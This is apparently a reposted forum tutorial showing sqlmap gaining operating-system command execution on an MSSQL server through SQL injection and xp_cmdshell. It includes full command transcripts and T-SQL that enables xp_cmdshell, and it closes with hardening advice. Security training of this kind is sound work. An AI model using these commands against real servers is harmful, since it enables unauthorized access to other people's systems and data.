SQLMAP shell — Windows
Posted 2012-9-28 23:56:49

Starting with MSSQL.

--os-cmd
root@Dis9Team:~# sqlmap -u http://5.5.5.3/get.asp?id=1 --os-cmd=ipconfig
[21:14:35] [INFO] testing if xp_cmdshell extended procedure is usable
[21:14:35] [INFO] the SQL query used returns 2 entries
[21:14:35] [INFO] retrieved: " "
[21:14:35] [INFO] retrieved: "1"
[21:14:35] [INFO] xp_cmdshell extended procedure is usable
do you want to retrieve the command standard output? [Y/n/a] Y
[21:14:37] [INFO] the SQL query used returns 11 entries
[21:14:37] [INFO] retrieved: "   Connection-specific DNS Suffix  . : \\r"
[21:14:37] [INFO] retrieved: "   Connection-specific DNS Suffix  . : \\r"
[21:14:37] [INFO] retrieved: "   Default Gateway . . . . . . . . . : \\r"
[21:14:37] [INFO] retrieved: "   IP Address. . . . . . . . . . . . : 5.5.5.3\\r"
[21:14:37] [INFO] retrieved: "   Subnet Mask . . . . . . . . . . . : 255.0.0.0\\r"
[21:14:37] [INFO] retrieved: "\\r"
[21:14:37] [INFO] heuristics detected web page charset 'GB2312'
[21:14:37] [INFO] retrieved: "Ethernet adapter 本地连接:\\r"
[21:14:37] [INFO] retrieved: "Ethernet adapter 本地连接:\\r"
[21:14:37] [INFO] retrieved: "Ethernet adapter 本地连接:\\r"
[21:14:37] [INFO] retrieved: "Ethernet adapter 本地连接:\\r"
[21:14:37] [INFO] retrieved: "Windows IP Configuration\\r"
command standard output:
---
   Connection-specific DNS Suffix  . :
   Connection-specific DNS Suffix  . :
   Default Gateway . . . . . . . . . :
   IP Address. . . . . . . . . . . . : 5.5.5.3
   Subnet Mask . . . . . . . . . . . : 255.0.0.0

Ethernet adapter 本地连接:
Ethernet adapter 本地连接:
Ethernet adapter 本地连接:
Ethernet adapter 本地连接:
Windows IP Configuration
---
[21:14:37] [INFO] cleaning up the database management system
[21:14:37] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.3'

[*] shutting down at 21:14:37

--os-shell

Runs through xp_cmdshell

root@Dis9Team:~# sqlmap -u http://5.5.5.3/get.asp?id=1 --os-shell
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a] Y
[21:15:10] [INFO] the SQL query used returns 9 entries
[21:15:10] [INFO] retrieved: " "
[21:15:10] [INFO] retrieved: "-------------------------------------------------------------------------------"
[21:15:10] [INFO] retrieved: "-------------------------------------------------------------------------------"
[21:15:10] [INFO] retrieved: "-------------------------------------------------------------------------------"
[21:15:10] [INFO] retrieved: "-------------------------------------------------------------------------------"
[21:15:10] [INFO] heuristics detected web page charset 'GB2312'
[21:15:10] [INFO] retrieved: "\\\\\\\\ 的用户帐户"
[21:15:10] [INFO] retrieved: "Administrator            ASPNET                   Guest                    "
[21:15:10] [INFO] retrieved: "IUSR_123456-E3952276     IWAM_123456-E3952276     SUPPORT_388945a0         "
[21:15:10] [INFO] retrieved: "命令运行完毕,但发生一个或多个错误。"
command standard output:
---
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
\\ 的用户帐户
Administrator            ASPNET                   Guest
IUSR_123456-E3952276     IWAM_123456-E3952276     SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。

--os-pwn

Uses a Metasploit (MSF) shell; unstable.



Play a thousand tunes and you will know music; examine a thousand swords and you will know weapons.
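What the two transcripts above boil down to on the database side, written out as the T-SQL that gets stacked onto the injectable parameter. This is an added example for this page; it is not code from the original post and not sqlmap's own code. The table name sqlmap_out and the command 'ipconfig' are assumptions for illustration. It also adds the two checks a practitioner wants before and after: whether the login can switch xp_cmdshell on at all (sysadmin), and whether it was left on afterwards.

```sql
-- Added example (not from the original post or from sqlmap): the T-SQL behind
-- sqlmap's --os-cmd / --os-shell on MSSQL, i.e. what lands after the ';' in
-- get.asp?id=1;<statement>--  when stacked queries are possible.
-- Run as one batch in SSMS or sqlcmd against a lab instance.
-- Assumed for illustration: table dbo.sqlmap_out, command 'ipconfig'.

-- 1. Preflight: xp_cmdshell can only be turned on by a login holding
--    ALTER SETTINGS (in practice, sysadmin). A web application login that
--    passes this check is the actual finding; the shell is the consequence.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,   -- 1 = yes, 0 = no
       SUSER_SNAME()                AS login_name;

SELECT name, value_in_use                            -- 0 = disabled (default)
FROM   sys.configurations
WHERE  name = 'xp_cmdshell';

-- 2. Enable it if step 1 shows it is off. This is the equivalent of the
--    "testing if xp_cmdshell extended procedure is usable" step.
EXEC master.dbo.sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC master.dbo.sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. Capture output into a permanent table, not a #temp table: through an
--    injection each HTTP request may land on a different connection, so a
--    temp table created in one request is not reliably there in the next.
--    The IDENTITY column plus ORDER BY guarantees line order; a SELECT from
--    a heap without ORDER BY carries no ordering guarantee, which is why
--    output read back through an injection can arrive shuffled (compare the
--    ipconfig lines in the transcript above).
IF OBJECT_ID('dbo.sqlmap_out', 'U') IS NOT NULL
    DROP TABLE dbo.sqlmap_out;
CREATE TABLE dbo.sqlmap_out (
    id   INT IDENTITY(1,1) PRIMARY KEY,
    line NVARCHAR(4000) NULL    -- xp_cmdshell yields one row per output line
);

INSERT INTO dbo.sqlmap_out (line)
EXEC master.dbo.xp_cmdshell 'ipconfig';

-- 4. Read it back. Over a blind injection this happens one row at a time
--    (WHERE id = 1, 2, ...), which is what the "retrieved:" lines show.
--    NULL rows are blank output lines plus the trailing terminator row.
SELECT id, line
FROM   dbo.sqlmap_out
ORDER BY id;

-- 5. Clean up, as in "cleaning up the database management system". Dropping
--    the table does not put xp_cmdshell back; a tester should restore the
--    original setting, and a defender should disable it outright:
DROP TABLE dbo.sqlmap_out;
EXEC master.dbo.sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 6. Post-check: confirm nothing was left enabled.
SELECT name, value_in_use
FROM   sys.configurations
WHERE  name = 'xp_cmdshell';          -- expect 0
```

On the defensive side the lesson of both transcripts is the same: the commands run as the SQL Server service account, so the two settings that matter are that the application's login is not sysadmin (step 1 then fails and sqlmap cannot enable xp_cmdshell) and that the service itself runs as a low-privilege account rather than LocalSystem, so that even a working xp_cmdshell yields an unprivileged shell.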
